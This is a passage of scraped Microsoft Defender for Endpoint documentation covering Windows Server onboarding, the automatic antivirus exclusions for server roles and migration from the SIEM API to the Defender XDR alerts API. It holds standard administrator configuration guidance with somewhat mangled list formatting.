- Replace \\\servername-or-dfs-space\share-name with the UNC path, using the file server's fully qualified domain name (FQDN), of the shared *install.ps1* file. The installer package md4ws.msi must be placed in the same directory. Ensure that the permissions of the UNC path allow write access to the computer account that is installing the package, to support creation of log files. If you wish to disable the creation of log files (not recommended), you can use the -noETL -noMSILog parameters.
-
- For scenarios where you want Microsoft Defender Antivirus to co-exist with non-Microsoft antimalware solutions, add the $Passive parameter to set passive mode during installation.
-
-9. Select **OK** and close any open GPMC windows.
-
-10. To link the GPO to an Organization Unit (OU), right-click and select **Link an existing GPO**. In the dialogue box that is displayed, select the Group Policy Object that you wish to link. Select **OK**.
-
-For more configuration settings, see [Configure sample collection settings](configure-endpoints-gp.md#configure-sample-collection-settings) and [Other recommended configuration settings](configure-endpoints-gp.md#other-recommended-configuration-settings).
-
-### STEP 3: Complete the onboarding steps
-
-The following steps are only applicable if you're using a third-party anti-malware solution. You'll need to apply the following Microsoft Defender Antivirus passive mode setting. Verify that it was configured correctly:
-
-1. Set the following registry entry:
- - Path: `HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection`
- - Name: `ForceDefenderPassiveMode`
- - Type: `REG_DWORD`
- - Value: `1`
-
- :::image type="content" source="media/atp-verify-passive-mode.png" alt-text="The passive mode verification result" lightbox="media/atp-verify-passive-mode.png":::
-
-#### Known issues and limitations in the new, unified solution package for Windows Server 2012 R2 and 2016
-
-> [!IMPORTANT]
->
-> Always download the latest installer package from the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) before performing a new installation and ensure prerequisites have been met. After installation, ensure to regularly update using component updates described in the section [Update packages for Microsoft Defender for Endpoint on Windows Server 2012 R2 and 2016](#update-packages-for-microsoft-defender-for-endpoint-on-windows-server-2012-r2-and-2016).
--- An operating system update can introduce an installation issue on machines with slower disks due to a timeout with service installation. Installation fails with the message "Could not find c:\program files\windows defender\mpasdesc.dll, - 310 WinDefend". Use the latest installation package, and the latest [install.ps1](https://github.com/microsoft/mdefordownlevelserver) script to help clear the failed installation if necessary.-- We've identified an issue with Windows Server 2012 R2 connectivity to cloud when static TelemetryProxyServer is used **and** the certificate revocation list (CRL) URLs aren't reachable from the SYSTEM account context. Ensure the EDR sensor is updated to version 10.8210.* or later (using [KB5005292](https://support.microsoft.com/topic/microsoft-defender-for-endpoint-update-for-edr-sensor-f8f69773-f17f-420f-91f4-a8e5167284ac)) to resolve the issue. Alternatively, use a different proxy option ("system-wide") that provides such connectivity, or configure the same proxy via the WinInet setting on the SYSTEM account context.-- On Windows Server 2012 R2, there's no user interface for Microsoft Defender Antivirus. In addition, the user interface on Windows Server 2016 only allows for basic operations. To perform operations on a device locally, refer to [Manage Microsoft Defender for Endpoint with PowerShell, WMI, and MPCmdRun.exe](/microsoft-365/security/defender-endpoint/manage-mde-post-migration-other-tools). As a result, features that specifically rely on user interaction, such as where the user is prompted to make a decision or perform a specific task, may not work as expected. It's recommended to disable or not enable the user interface nor require user interaction on any managed server as it may impact protection capability.-- Not all Attack Surface Reduction rules are applicable to all operating systems. See [Attack surface reduction rules](/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules).-- Operating system upgrades aren't supported. Offboard then uninstall before upgrading. The installer package can only be used to upgrade installations that have not yet been updated with new antimalware platform or EDR sensor update packages.-- Automatic exclusions for **server roles** aren't supported on Windows Server 2012 R2; however, built-in exclusions for operating system files are. For more information about adding exclusions, see [Configure Microsoft Defender Antivirus exclusions on Windows Server](configure-server-exclusions-microsoft-defender-antivirus.md).-- To automatically deploy and onboard the new solution using Microsoft Endpoint Configuration Manager (MECM) you need to be on [version 2207 or later](/mem/configmgr/core/plan-design/changes/whats-new-in-version-2207#improved-microsoft-defender-for-endpoint-mde-onboarding-for-windows-server-2012-r2-and-windows-server-2016). You can still configure and deploy using version 2107 with the hotfix rollup, but this requires additional deployment steps. See [Microsoft Endpoint Configuration Manager migration scenarios](/microsoft-365/security/defender-endpoint/server-migration#microsoft-endpoint-configuration-manager-migration-scenarios) for more information.-
-## Windows Server Semi-Annual Enterprise Channel (SAC), Windows Server 2019 and Windows Server 2022
-
-### Download package
-
-1. In Microsoft Defender XDR, go to **Settings > Endpoints > Device Management > Onboarding**.
-
-2. Select **Windows Server 1803 and 2019**.
-
-3. Select **Download package**. Save it as WindowsDefenderATPOnboardingPackage.zip.
-
-4. Follow the steps provided in the [Complete the onboarding steps](#step-3-complete-the-onboarding-steps) section.
-
-## Verify the onboarding and installation
-
-Verify that Microsoft Defender Antivirus and Microsoft Defender for Endpoint are running.
-
-## Run a detection test to verify onboarding
-
-After onboarding the device, you can choose to run a detection test to verify that a device is properly onboarded to the service. For more information, see [Run a detection test on a newly onboarded Microsoft Defender for Endpoint device](run-detection-test.md).
-
-> [!NOTE]
-> Running Microsoft Defender Antivirus is not required but it is recommended. If another antivirus vendor product is the primary endpoint protection solution, you can run Defender Antivirus in Passive mode. You can only confirm that passive mode is on after verifying that Microsoft Defender for Endpoint sensor (SENSE) is running.
-
-1. Run the following command to verify that Microsoft Defender Antivirus is installed:
-
- > [!NOTE]
- > This verification step is only required if you're using Microsoft Defender Antivirus as your active antimalware solution.
-
- ```cmd
- sc.exe query Windefend
- ```
-
- If the result is 'The specified service doesn't exist as an installed service', then you'll need to install Microsoft Defender Antivirus.
-
- For information on how to use Group Policy to configure and manage Microsoft Defender Antivirus on your Windows servers, see [Use Group Policy settings to configure and manage Microsoft Defender Antivirus](use-group-policy-microsoft-defender-antivirus.md).
-
-2. Run the following command to verify that Microsoft Defender for Endpoint is running:
-
- ```cmd
- sc.exe query sense
- ```
-
- The result should show it's running. If you encounter issues with onboarding, see [Troubleshoot onboarding](troubleshoot-onboarding.md).
-
-## Run a detection test
-
-Follow the steps in [Run a detection test on a newly onboarded device](run-detection-test.md) to verify that the server is reporting to Defender for the Endpoint service.
-
-## Next steps
-
-After successfully onboarding devices to the service, you'll need to configure the individual components of Microsoft Defender for Endpoint. Follow [Configure capabilities](onboard-configure.md#configure-capabilities) to be guided on enabling the various components.
-
-## Offboard Windows servers
-
-You can offboard Windows Server 2012 R2, Windows Server 2016, Windows Server (SAC), Windows Server 2019, and Windows Server 2019 Core edition in the same method available for Windows 10 client devices.
--- [Offboard devices using Group Policy](configure-endpoints-gp.md#offboard-devices-using-group-policy)-- [Offboard devices using Configuration Manager](configure-endpoints-sccm.md#offboard-devices-using-configuration-manager)-- [Offboard devices using Mobile Device Management tools](configure-endpoints-mdm.md#offboard-devices-using-mobile-device-management-tools)-- [Offboard devices using a local script](configure-endpoints-script.md#offboard-devices-using-a-local-script)-
-After offboarding, you can proceed to uninstall the unified solution package on Windows Server 2012 R2 and Windows Server 2016.
-
-For other Windows server versions, you have two options to offboard Windows servers from the service:
--- Uninstall the MMA agent-- Remove the Defender for Endpoint workspace configuration-
-> [!NOTE]
-> These offboarding instructions for other Windows server versions also apply if you are running the previous Microsoft Defender for Endpoint for Windows Server 2016 and Windows Server 2012 R2 that requires the MMA. Instructions to migrate to the new unified solution are at [Server migration scenarios in Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/server-migration).
-
-## Related articles
--- [Onboard previous versions of Windows](onboard-downlevel.md)-- [Onboard Windows 10 devices](configure-endpoints.md)-- [Onboard non-Windows devices](configure-endpoints-non-windows.md)-- [Configure proxy and Internet connectivity settings](configure-proxy-internet.md)-- [Run a detection test on a newly onboarded Defender for Endpoint device](run-detection-test.md)-- [Troubleshooting Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md)-- [Microsoft Entra seamless single sign-on](/azure/active-directory/hybrid/how-to-connect-sso-quick-start)-- [Troubleshoot onboarding issues related to Security Management for Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/troubleshoot-security-config-mgt#instructions-for-applying-computer-join-rule-in-aad-connect)
security Configure Server Exclusions Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-server-exclusions-microsoft-defender-antivirus.md
- Title: Microsoft Defender Antivirus exclusions on Windows Server--
-description: Windows Server includes automatic exclusions, based on server role. You can also add custom exclusions.
-- Previously updated : 08/07/2023------- m365-security-- tier2-- mde-ngp--
-# Microsoft Defender Antivirus exclusions on Windows Server
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
--- Windows-
-This article describes types of exclusions that you don't have to define for Microsoft Defender Antivirus:
--- [Built-in exclusions](#built-in-exclusions) for operating system files on all versions of Windows. -- [Automatic exclusions](#automatic-server-role-exclusions) for roles on Windows Server 2016 and later. -
-For a more detailed overview of exclusions, see [Manage exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md).
-
-## A few important points about exclusions on Windows Server
--- Custom exclusions take precedence over automatic exclusions.-- Automatic exclusions only apply to [real-time protection (RTP)](configure-protection-features-microsoft-defender-antivirus.md) scanning. -- Automatic exclusions aren't honored during a [quick scan, full scan, and custom scan](schedule-antivirus-scans.md#comparing-the-quick-scan-full-scan-and-custom-scan).-- Custom and duplicate exclusions don't conflict with automatic exclusions.-- Microsoft Defender Antivirus uses the Deployment Image Servicing and Management (DISM) tools to determine which roles are installed on your computer.-- Appropriate exclusions must be set for software that isn't included with the operating system.-- Windows Server 2012 R2 doesn't have Microsoft Defender Antivirus as an installable feature. When you onboard those servers to Defender for Endpoint, you'll install Microsoft Defender Antivirus, and default exclusions for operating system files are applied. However, exclusions for server roles (as specified below) don't apply automatically, and you should configure these exclusions as appropriate. To learn more, see [Onboard Windows servers to the Microsoft Defender for Endpoint service](configure-server-endpoints.md).-- Built-in exclusions and automatic server role exclusions don't appear in the standard exclusion lists that are shown in the [Windows Security app](microsoft-defender-security-center-antivirus.md).-- The list of built-in exclusions in Windows is kept up to date as the threat landscape changes. This article lists some, but not all, of the built-in and automatic exclusions. -
-## Automatic server role exclusions
-
-On Windows Server 2016 or later, you shouldn't need to define exclusions for server roles. When you install a role on Windows Server 2016 or later, Microsoft Defender Antivirus includes automatic exclusions for the server role and any files that are added while installing the role.
-
-Windows Server 2012 R2 does not support the automatic exclusions feature. You'll need to define explicit exclusions for any server role and any software that's added after installing the operating system.
-
-> [!IMPORTANT]
-> - Default locations could be different than the locations that are described in this article.
-> - To set exclusions for software that isn't included as a Windows feature or server role, refer to the software manufacturer's documentation.
-
-Automatic exclusions include:
--- [Hyper-V exclusions](#hyper-v-exclusions)-- [SYSVOL files](#sysvol-files)-- [Active Directory exclusions](#active-directory-exclusions)-- [DHCP Server exclusions](#dhcp-server-exclusions)-- [DNS Server exclusions](#dns-server-exclusions)-- [File and Storage Services exclusions](#file-and-storage-services-exclusions)-- [Print Server exclusions](#print-server-exclusions)-- [Web Server exclusions](#web-server-exclusions)-- [Windows Server Update Services exclusions](#windows-server-update-services-exclusions)-
-### Hyper-V exclusions
-
-The following table lists the file type exclusions, folder exclusions, and process exclusions that are delivered automatically when you install the Hyper-V role.
-
-|Exclusion type|Specifics|
-|||
-|File types|`*.vhd` <br/> `*.vhdx` <br/> `*.avhd` <br/> `*.avhdx` <br/> `*.vsv` <br/> `*.iso` <br/> `*.rct` <br/> `*.vmcx` <br/> `*.vmrs`|
-|Folders|`%ProgramData%\Microsoft\Windows\Hyper-V` <br/> `%ProgramFiles%\Hyper-V` <br/> `%SystemDrive%\ProgramData\Microsoft\Windows\Hyper-V\Snapshots` <br/> `%Public%\Documents\Hyper-V\Virtual Hard Disks`|
-|Processes|`%systemroot%\System32\Vmms.exe` <br/> `%systemroot%\System32\Vmwp.exe`|
-
-### SYSVOL files
--- `%systemroot%\Sysvol\Domain\*.adm`-- `%systemroot%\Sysvol\Domain\*.admx`-- `%systemroot%\Sysvol\Domain\*.adml`-- `%systemroot%\Sysvol\Domain\Registry.pol`-- `%systemroot%\Sysvol\Domain\*.aas`-- `%systemroot%\Sysvol\Domain\*.inf`-- `%systemroot%\Sysvol\Domain\*Scripts.ini`-- `%systemroot%\Sysvol\Domain\*.ins`-- `%systemroot%\Sysvol\Domain\Oscfilter.ini`-
-### Active Directory exclusions
-
-This section lists the exclusions that are delivered automatically when you install Active Directory Domain Services (AD DS).
-
-#### NTDS database files
-
-The database files are specified in the registry key `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\DSA Database File`
--- `%windir%\Ntds\ntds.dit`-- `%windir%\Ntds\ntds.pat`-
-#### The AD DS transaction log files
-
-The transaction log files are specified in the registry key `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\Database Log Files Path`
--- `%windir%\Ntds\EDB*.log`-- `%windir%\Ntds\Res*.log`-- `%windir%\Ntds\Edb*.jrs`-- `%windir%\Ntds\Ntds*.pat`-- `%windir%\Ntds\TEMP.edb`-
-#### The NTDS working folder
-
-This folder is specified in the registry key `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\DSA Working Directory`
--- `%windir%\Ntds\Temp.edb`-- `%windir%\Ntds\Edb.chk`-
-#### Process exclusions for AD DS and AD DS-related support files
--- `%systemroot%\System32\ntfrs.exe`-- `%systemroot%\System32\lsass.exe`-
-### DHCP Server exclusions
-
-This section lists the exclusions that are delivered automatically when you install the DHCP Server role. The DHCP Server file locations are specified by the *DatabasePath*, *DhcpLogFilePath*, and *BackupDatabasePath* parameters in the registry key `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DHCPServer\Parameters`
--- `%systemroot%\System32\DHCP\*\*.mdb`-- `%systemroot%\System32\DHCP\*\*.pat`-- `%systemroot%\System32\DHCP\*\*.log`-- `%systemroot%\System32\DHCP\*\*.chk`-- `%systemroot%\System32\DHCP\*\*.edb`-
-### DNS Server exclusions
-
-This section lists the file and folder exclusions and the process exclusions that are delivered automatically when you install the DNS Server role.
-
-#### File and folder exclusions for the DNS Server role
--- `%systemroot%\System32\Dns\*\*.log`-- `%systemroot%\System32\Dns\*\*.dns`-- `%systemroot%\System32\Dns\*\*.scc`-- `%systemroot%\System32\Dns\*\BOOT`-
-#### Process exclusions for the DNS Server role
--- `%systemroot%\System32\dns.exe`-
-### File and Storage Services exclusions
-
-This section lists the file and folder exclusions that are delivered automatically when you install the File and Storage Services role. The exclusions listed below don't include exclusions for the Clustering role.
--- `%SystemDrive%\ClusterStorage`-- `%clusterserviceaccount%\Local Settings\Temp`-- `%SystemDrive%\mscs`-
-### Print Server exclusions
-
-This section lists the file type exclusions, folder exclusions, and the process exclusions that are delivered automatically when you install the Print Server role.
-
-#### File type exclusions
--- `*.shd`-- `*.spl`-
-#### Folder exclusions
-
-This folder is specified in the registry key `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Printers\DefaultSpoolDirectory`
--- `%system32%\spool\printers\*`-
-#### Process exclusions for the Print Server role
--- `spoolsv.exe`-
-### Web Server exclusions
-
-This section lists the folder exclusions and the process exclusions that are delivered automatically when you install the Web Server role.
-
-#### Folder exclusions
--- `%SystemRoot%\IIS Temporary Compressed Files`-- `%SystemDrive%\inetpub\temp\IIS Temporary Compressed Files`-- `%SystemDrive%\inetpub\temp\ASP Compiled Templates`-- `%systemDrive%\inetpub\logs`-- `%systemDrive%\inetpub\wwwroot`-
-#### Process exclusions for the Web Server role
--- `%SystemRoot%\system32\inetsrv\w3wp.exe`-- `%SystemRoot%\SysWOW64\inetsrv\w3wp.exe`-- `%SystemDrive%\PHP5433\php-cgi.exe`-
-#### Turning off scanning of files in the Sysvol\Sysvol folder or the SYSVOL_DFSR\Sysvol folder
-
-The current location of the `Sysvol\Sysvol` or `SYSVOL_DFSR\Sysvol` folder and all the subfolders is the file system reparse target of the replica set root. The `Sysvol\Sysvol` and `SYSVOL_DFSR\Sysvol` folders use the following locations by default:
--- `%systemroot%\Sysvol\Domain`-- `%systemroot%\Sysvol_DFSR\Domain`-
-The path to the currently active `SYSVOL` is referenced by the NETLOGON share and can be determined by the SysVol value name in the following subkey: `HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Netlogon\Parameters`
-
-Exclude the following files from this folder and all its subfolders:
--- `*.adm`-- `*.admx`-- `*.adml`-- `Registry.pol`-- `Registry.tmp`-- `*.aas`-- `*.inf`-- `Scripts.ini`-- `*.ins`-- `Oscfilter.ini`-
-### Windows Server Update Services exclusions
-
-This section lists the folder exclusions that are delivered automatically when you install the Windows Server Update Services (WSUS) role. The WSUS folder is specified in the registry key `HKEY_LOCAL_MACHINE\Software\Microsoft\Update Services\Server\Setup`
--- `%systemroot%\WSUS\WSUSContent`-- `%systemroot%\WSUS\UpdateServicesDBFiles`-- `%systemroot%\SoftwareDistribution\Datastore`-- `%systemroot%\SoftwareDistribution\Download`-
-## Built-in exclusions
-
-Because Microsoft Defender Antivirus is built into Windows, it doesn't require exclusions for operating system files on any version of Windows.
-
-Built-in exclusions include:
--- [Windows "temp.edb" files](#windows-tempedb-files)-- [Windows Update files or Automatic Update files](#windows-update-files-or-automatic-update-files)-- [Windows Security files](#windows-security-files)-- [Group Policy files](#group-policy-files)-- [WINS files](#wins-files)-- [File Replication Service (FRS) exclusions](#file-replication-service-frs-exclusions)-- [Process exclusions for built-in operating system files](#process-exclusions-for-built-in-operating-system-files)-
-The list of built-in exclusions in Windows is kept up to date as the threat landscape changes.
-
-### Windows "temp.edb" files
--- `%windir%\SoftwareDistribution\Datastore\*\tmp.edb`-- `%ProgramData%\Microsoft\Search\Data\Applications\Windows\windows.edb`-
-### Windows Update files or Automatic Update files
--- `%windir%\SoftwareDistribution\Datastore\*\Datastore.edb`-- `%windir%\SoftwareDistribution\Datastore\*\edb.chk`-- `%windir%\SoftwareDistribution\Datastore\*\edb\*.log`-- `%windir%\SoftwareDistribution\Datastore\*\Edb\*.jrs`-- `%windir%\SoftwareDistribution\Datastore\*\Res\*.log`-
-### Windows Security files
--- `%windir%\Security\database\*.chk`-- `%windir%\Security\database\*.edb`-- `%windir%\Security\database\*.jrs`-- `%windir%\Security\database\*.log`-- `%windir%\Security\database\*.sdb`-
-### Group Policy files
--- `%allusersprofile%\NTUser.pol`-- `%SystemRoot%\System32\GroupPolicy\Machine\registry.pol`-- `%SystemRoot%\System32\GroupPolicy\User\registry.pol`-
-### WINS files
--- `%systemroot%\System32\Wins\*\*.chk`-- `%systemroot%\System32\Wins\*\*.log`-- `%systemroot%\System32\Wins\*\*.mdb`-- `%systemroot%\System32\LogFiles\`-- `%systemroot%\SysWow64\LogFiles\`-
-### File Replication Service (FRS) exclusions
--- Files in the File Replication Service (FRS) working folder. The FRS working folder is specified in the registry key `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NtFrs\Parameters\Working Directory`-
- - `%windir%\Ntfrs\jet\sys\*\edb.chk`
- - `%windir%\Ntfrs\jet\*\Ntfrs.jdb`
- - `%windir%\Ntfrs\jet\log\*\*.log`
--- FRS Database log files. The FRS Database log file folder is specified in the registry key `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Ntfrs\Parameters\DB Log File Directory`-
- - `%windir%\Ntfrs\*\Edb\*.log`
--- The FRS staging folder. The staging folder is specified in the registry key `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NtFrs\Parameters\Replica Sets\GUID\Replica Set Stage`-
- - `%systemroot%\Sysvol\*\Ntfrs_cmp*\`
--- The FRS preinstall folder. This folder is specified by the folder `Replica_root\DO_NOT_REMOVE_NtFrs_PreInstall_Directory`-
- - `%systemroot%\SYSVOL\domain\DO_NOT_REMOVE_NtFrs_PreInstall_Directory\*\Ntfrs*\`
--- The Distributed File System Replication (DFSR) database and working folders. These folders are specified by the registry key `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\GUID\Replica Set Configuration File`-
- > [!NOTE]
- > For custom locations, see [Opting out of automatic exclusions](#opting-out-of-automatic-exclusions).
-
- - `%systemdrive%\System Volume Information\DFSR\$db_normal$`
- - `%systemdrive%\System Volume Information\DFSR\FileIDTable_*`
- - `%systemdrive%\System Volume Information\DFSR\SimilarityTable_*`
- - `%systemdrive%\System Volume Information\DFSR\*.XML`
- - `%systemdrive%\System Volume Information\DFSR\$db_dirty$`
- - `%systemdrive%\System Volume Information\DFSR\$db_clean$`
- - `%systemdrive%\System Volume Information\DFSR\$db_lostl$`
- - `%systemdrive%\System Volume Information\DFSR\Dfsr.db`
- - `%systemdrive%\System Volume Information\DFSR\*.frx`
- - `%systemdrive%\System Volume Information\DFSR\*.log`
- - `%systemdrive%\System Volume Information\DFSR\Fsr*.jrs`
- - `%systemdrive%\System Volume Information\DFSR\Tmp.edb`
-
-### Process exclusions for built-in operating system files
--- `%systemroot%\System32\dfsr.exe`-- `%systemroot%\System32\dfsrs.exe`-
-## Opting out of automatic exclusions
-
-In Windows Server 2016 and later, the predefined exclusions delivered by [Security intelligence updates](microsoft-defender-antivirus-updates.md#security-intelligence-updates) only exclude the default paths for a role or feature. If you installed a role or feature in a custom path, or you want to manually control the set of exclusions, make sure to opt out of the automatic exclusions delivered in Security intelligence updates. But keep in mind that the exclusions that are delivered automatically are optimized for Windows Server 2016 and later. See [Important points about exclusions](configure-exclusions-microsoft-defender-antivirus.md#important-points-about-exclusions) before defining your exclusion lists.
-
-> [!WARNING]
-> Opting out of automatic exclusions might adversely impact performance, or result in data corruption. Automatic server role exclusions are optimized for Windows Server 2016, Windows Server 2019, and Windows Server 2022.
-
-Because predefined exclusions only exclude **default paths**, if you move NTDS and SYSVOL folders to another drive or path that is *different from the original path*, you must add exclusions manually. See [Configure the list of exclusions based on folder name or file extension](configure-extension-file-exclusions-microsoft-defender-antivirus.md#configure-the-list-of-exclusions-based-on-folder-name-or-file-extension).
-
-You can disable the automatic exclusion lists with Group Policy, PowerShell cmdlets, and WMI.
-
-### Use Group Policy to disable the auto-exclusions list on Windows Server 2016, Windows Server 2019, and Windows Server 2022
-
-1. On your Group Policy management computer, open the [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc725752(v=ws.11)). Right-click the Group Policy Object you want to configure, and then select **Edit**.
-
-2. In the **Group Policy Management Editor** go to **Computer configuration**, and then select **Administrative templates**.
-
-3. Expand the tree to **Windows components** \> **Microsoft Defender Antivirus** \> **Exclusions**.
-
-4. Double-click **Turn off Auto Exclusions**, and set the option to **Enabled**. Then select **OK**.
-
-### Use PowerShell cmdlets to disable the auto-exclusions list on Windows Server
-
-Use the following cmdlets:
-
-```PowerShell
-Set-MpPreference -DisableAutoExclusions $true
-```
-
-To learn more, see the following resources:
--- [Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus](use-powershell-cmdlets-microsoft-defender-antivirus.md).-- [Use PowerShell with Microsoft Defender Antivirus](/powershell/module/defender/).-
-### Use Windows Management Instruction (WMI) to disable the auto-exclusions list on Windows Server
-
-Use the **Set** method of the [MSFT_MpPreference](/previous-versions/windows/desktop/defender/msft-mppreference) class for the following properties:
-
-```WMI
-DisableAutoExclusions
-```
-
-For more information and allowed parameters, see:
--- [Windows Defender WMIv2 APIs](/previous-versions/windows/desktop/defender/windows-defender-wmiv2-apis-portal)-
-## Defining custom exclusions
-
-If necessary, you can add or remove custom exclusions. To do that, see the following articles:
--- [Configure custom exclusions for Microsoft Defender Antivirus](configure-exclusions-microsoft-defender-antivirus.md)-- [Configure and validate exclusions based on file name, extension, and folder location](configure-extension-file-exclusions-microsoft-defender-antivirus.md)-- [Configure and validate exclusions for files opened by processes](configure-process-opened-file-exclusions-microsoft-defender-antivirus.md)-
- ## See also
--- [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)-- [Common mistakes to avoid when defining exclusions](common-exclusion-mistakes-microsoft-defender-antivirus.md)-- [Customize, initiate, and review the results of Microsoft Defender Antivirus scans and remediation](customize-run-review-remediate-scans-microsoft-defender-antivirus.md)-- [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)-- [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)-- [Configure Defender for Endpoint on Android features](android-configure.md)-- [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)-
security Configure Siem https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-siem.md
- Title: Migrate from the MDE SIEM API to the Microsoft Defender XDR alerts API
-description: Learn how to ingest incidents and alerts, and integrate SIEM tools.
------- m365-security-- tier2- Previously updated : 12/18/2020--
-# Migrate from the MDE SIEM API to the Microsoft Defender XDR alerts API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-<a name='use-the-new-microsoft-365-defender-api-for-all-your-alerts'></a>
-
-## Use the new Microsoft Defender XDR API for all your alerts
-
-The Microsoft Defender XDR alerts API, released to public preview in MS Graph, is the official and recommended API for customers migrating from the SIEM API. This API enables customers to work with alerts across all Microsoft Defender XDR products using a single integration. We expect the new API to reach general availability (GA) by Q1 CY 2023.
-
-The SIEM API was deprecated on December 31, 2023. It's declared to be "deprecated," but not "retired." This means that until this date, the SIEM API continues to function for existing customers. After the deprecation date, the SIEM API will continue to be available, however it will only be supported for security-related fixes.
-
-Effective December 31, 2024, three years after the original deprecation announcement, we reserve the right to turn off the SIEM API, without further notice.
-
-For additional information about the new APIs, see the blog announcement: [The new Microsoft Defender XDR APIs in Microsoft Graph are now available in public preview!](https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/the-new-microsoft-365-defender-apis-in-microsoft-graph-are-now/ba-p/3603099)
-
-API documentation: [Use the Microsoft Graph security API - Microsoft Graph](/graph/api/resources/security-api-overview#alerts-and-incidents-preview)
-
-If you're a customer using the SIEM API, we strongly recommend planning and executing the migration. This article includes information about the options available to migrate to a supported capability:
-
-1. [Pulling MDE alerts into an external system](#pulling-defender-for-endpoint-alerts-into-an-external-system) (SIEM/SOAR).
-
-1. [Calling the Microsoft Defender XDR alerts API directly](#calling-the-microsoft-365-defender-alerts-api-directly).
-
-Read about the new Microsoft Defender XDR [alerts and incidents API](https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/the-new-microsoft-365-defender-apis-in-microsoft-graph-are-now/ba-p/3603099#:~:text=Incidents%3A%20Contain%20incident%20metadata%20and%20a%20collection%20of,richer%20and%20actionable%20information%20for%20your%20automation%20flows.)
-
-### Pulling Defender for Endpoint alerts into an external system
-
-If you're pulling Defender for Endpoint alerts into an external system, there are several supported options to give organizations the flexibility to work with the solution of their choice:
-
-1. **Microsoft Sentinel** is a scalable, cloud-native, SIEM and Security orchestration, automation, and response (SOAR) solution. Delivers intelligent security analytics and threat intelligence across the enterprise, providing a single solution for attack detection, threat visibility, proactive hunting, and threat response. The Microsoft Defender XDR connector allows customers to easily pull in all their incidents and alerts from all Microsoft Defender XDR products. To learn more about the integration, see [Microsoft Defender XDR integration with Microsoft Sentinel](/azure/sentinel/microsoft-365-defender-sentinel-integration).
-
-1. **IBM Security QRadar** SIEM provides centralized visibility and intelligent security analytics to identify and prevent threats and vulnerabilities from disrupting business operations. [QRadar SIEM team has just announced the release of a new DSM](https://community.ibm.com/community/user/security/blogs/gaurav-sharma/2022/10/18/ibm-qradar-and-microsoft-defender) that is integrated with the new Microsoft Defender XDR alerts API to pull in Microsoft Defender for Endpoint alerts. New customers are welcome to take advantage of the new DSM upon release. Learn more about the new DSM and how to easily migrate to it at [Microsoft Defender XDR - IBM Documentation](https://www.ibm.com/docs/en/dsm?topic=microsoft-365-defender).
-
-1. **Splunk SOAR** helps customers orchestrate workflows and automate tasks in seconds to work smarter and respond faster. Splunk SOAR is integrated with the new Microsoft Defender XDR APIs, including the alerts API. For more information, see [Microsoft Defender XDR | Splunkbase](https://splunkbase.splunk.com/app/6563)
-
-Other integrations are listed in [Technological partners of Microsoft Defender XDR](technological-partners.md), or contact your SIEM / SOAR provider to learn about integrations they provide.
-
-<a name='calling-the-microsoft-365-defender-alerts-api-directly'></a>
-
-### Calling the Microsoft Defender XDR alerts API directly
-
-The below table provides a mapping between the SIEM API to the Microsoft Defender XDR alerts API:
-
-| SIEM API property | Mapping | Microsoft Defender XDR alert API property |
-|:|::|:|
-| `AlertTime` |->| `createdDateTime` |
-| `ComputerDnsName` |->| `evidence/deviceEvidence: deviceDnsName` |
-| `AlertTitle` |->| `title` |
-| `Category` |->| `category` |
-| `Severity` |->| `severity` |
-| `AlertId` |->| `id` |
-| `Actor` |->| `actorDisplayName` |
-| `LinkToWDATP` |->| alertWebUrl |
-| `IocName` | X | IoC fields not supported |
-| `IocValue` | X | IoC fields not supported |
-| `CreatorIocName` | X | IoC fields not supported |
-| `CreatorIocValue` | X | IoC fields not supported |
-| `Sha1` |->| `evidence/fileEvidence/fileDetails: sha1 (or evidence/processEvidence/imageFile: sha1)` |
-| `FileName` |->| `evidence/fileEvidence/fileDetails: fileName (or evidence/processEvidence/image: fileName)` |
-| `FilePath` |->| `evidence/fileEvidence/fileDetails: filePath (or evidence/processEvidence/image: filePath)` |
-| `IPAddress` |->| `evidence/ipEvidence: ipAddress` |
-| `URL` | -> | `evidence/urlEvidence: url` |
-| `IoaDefinitionId` |->| `detectorId` |
-| `UserName` |->| `evidence/userEvidence/userAccount: accountName` |
-| `AlertPart` | X | Obsolete (Defender for Endpoint alerts are atomic/complete that are updatable, while the SIEM API were immutable records of detections) |
-| `FullId` | X | IoC fields not supported |
